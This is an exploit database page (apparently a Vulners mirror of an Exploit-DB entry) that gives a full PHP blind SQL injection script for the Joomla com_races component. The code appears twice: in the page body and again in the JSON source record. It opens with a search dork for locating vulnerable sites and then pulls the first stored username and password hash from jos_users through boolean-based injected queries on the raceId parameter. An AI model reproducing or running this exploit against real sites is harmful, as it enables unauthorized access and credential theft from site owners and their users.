Search...

Joomla Component com_races Blind SQL Injection Vulnerability

2010-03-13T00:00:00

ID EDB-ID:11710
Type exploitdb
Reporter DevilZ TM
Modified 2010-03-13T00:00:00

Description

Joomla Component com_races Blind SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            #!/usr/bin/php
&lt;?php
ini_set("max_execution_time",0);
print_r('
######################################################################
#  [x]Dork:inurl:index.php?option=com_races "raceId"
#  [x]Joomla com_races (raceId) Blind SQL Injection Exploit
#  [x] Usage: Cristal.php "http://url/index.php?option=com_races&task=result&raceId=272
#####################################################################
');
if ($argc &gt; 1) {
$url = $argv[1];
$r = strlen(file_get_contents($url."+and+1=1--"));
echo "\nExploiting:\n";
$w = strlen(file_get_contents($url."+and+1=0--"));
$t = abs((100-($w/$r*100)));
echo "Username: ";
for ($i=1; $i &lt;= 30; $i++) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--"));
   if (abs((100-($laenge/$r*100))) &gt; $t-1) {
      $count = $i;
      $i = 30;
   }
}
for ($j = 1; $j &lt; $count; $j++) {
   for ($i = 46; $i &lt;= 122; $i=$i+2) {
      if ($i == 60) {
         $i = 98;
      }
      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
      if (abs((100-($laenge/$r*100))) &gt; $t-1) {
         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
         if (abs((100-($laenge/$r*100))) &gt; $t-1) {
            echo chr($i-1);
         } else {
            echo chr($i);
         }
         $i = 122;
      }
   }
}
echo "\nPassword: ";
for ($j = 1; $j &lt;= 49; $j++) {
   for ($i = 46; $i &lt;= 102; $i=$i+2) {
      if ($i == 60) {
         $i = 98;
      }
      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
      if (abs((100-($laenge/$r*100))) &gt; $t-1) {
         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
         if (abs((100-($laenge/$r*100))) &gt; $t-1) {
            echo chr($i-1);
         } else {
            echo chr($i);
         }
         $i = 102;
      }
   }
}
}
?&gt;

JSON Vulners Source

Initial Source

{"id": "EDB-ID:11710", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Joomla Component com_races Blind SQL Injection Vulnerability", "description": "Joomla Component com_races Blind SQL Injection Vulnerability. Webapps exploit for php platform", "published": "2010-03-13T00:00:00", "modified": "2010-03-13T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/11710/", "reporter": "DevilZ TM", "references": [], "cvelist": [], "lastseen": "2016-02-01T14:52:37", "viewCount": 10, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2016-02-01T14:52:37", "rev": 2}, "dependencies": {"references": [], "modified": "2016-02-01T14:52:37", "rev": 2}, "vulnersScore": 0.3}, "sourceHref": "https://www.exploit-db.com/download/11710/", "sourceData": "#!/usr/bin/php\r\n<?php\r\nini_set(\"max_execution_time\",0);\r\nprint_r('\r\n######################################################################\r\n# [x]Dork:inurl:index.php?option=com_races \"raceId\"\r\n# [x]Joomla com_races (raceId) Blind SQL Injection Exploit\r\n# [x] Usage: Cristal.php \"http://url/index.php?option=com_races&task=result&raceId=272\r\n#####################################################################\r\n');\r\nif ($argc > 1) {\r\n$url = $argv[1];\r\n$r = strlen(file_get_contents($url.\"+and+1=1--\"));\r\necho \"\\nExploiting:\\n\";\r\n$w = strlen(file_get_contents($url.\"+and+1=0--\"));\r\n$t = abs((100-($w/$r*100)));\r\necho \"Username: \";\r\nfor ($i=1; $i <= 30; $i++) {\r\n$laenge = strlen(file_get_contents($url.\"+and+ascii(substring((select+username+from+jos_users+limit+0,1),\".$i.\",1))!=0--\"));\r\n if (abs((100-($laenge/$r*100))) > $t-1) {\r\n $count = $i;\r\n $i = 30;\r\n }\r\n}\r\nfor ($j = 1; $j < $count; $j++) {\r\n for ($i = 46; $i <= 122; $i=$i+2) {\r\n if ($i == 60) {\r\n $i = 98;\r\n }\r\n $laenge = strlen(file_get_contents($url.\"+and+ascii(substring((select+username+from+jos_users+limit+0,1),\".$j.\",1))%3E\".$i.\"--\"));\r\n if (abs((100-($laenge/$r*100))) > $t-1) {\r\n $laenge = strlen(file_get_contents($url.\"+and+ascii(substring((select+username+from+jos_users+limit+0,1),\".$j.\",1))%3E\".($i-1).\"--\"));\r\n if (abs((100-($laenge/$r*100))) > $t-1) {\r\n echo chr($i-1);\r\n } else {\r\n echo chr($i);\r\n }\r\n $i = 122;\r\n }\r\n }\r\n}\r\necho \"\\nPassword: \";\r\nfor ($j = 1; $j <= 49; $j++) {\r\n for ($i = 46; $i <= 102; $i=$i+2) {\r\n if ($i == 60) {\r\n $i = 98;\r\n }\r\n $laenge = strlen(file_get_contents($url.\"+and+ascii(substring((select+password+from+jos_users+limit+0,1),\".$j.\",1))%3E\".$i.\"--\"));\r\n if (abs((100-($laenge/$r*100))) > $t-1) {\r\n $laenge = strlen(file_get_contents($url.\"+and+ascii(substring((select+password+from+jos_users+limit+0,1),\".$j.\",1))%3E\".($i-1).\"--\"));\r\n if (abs((100-($laenge/$r*100))) > $t-1) {\r\n echo chr($i-1);\r\n } else {\r\n echo chr($i);\r\n }\r\n $i = 102;\r\n }\r\n }\r\n}\r\n}\r\n?>\r\n\r\n\r\n", "osvdbidlist": []}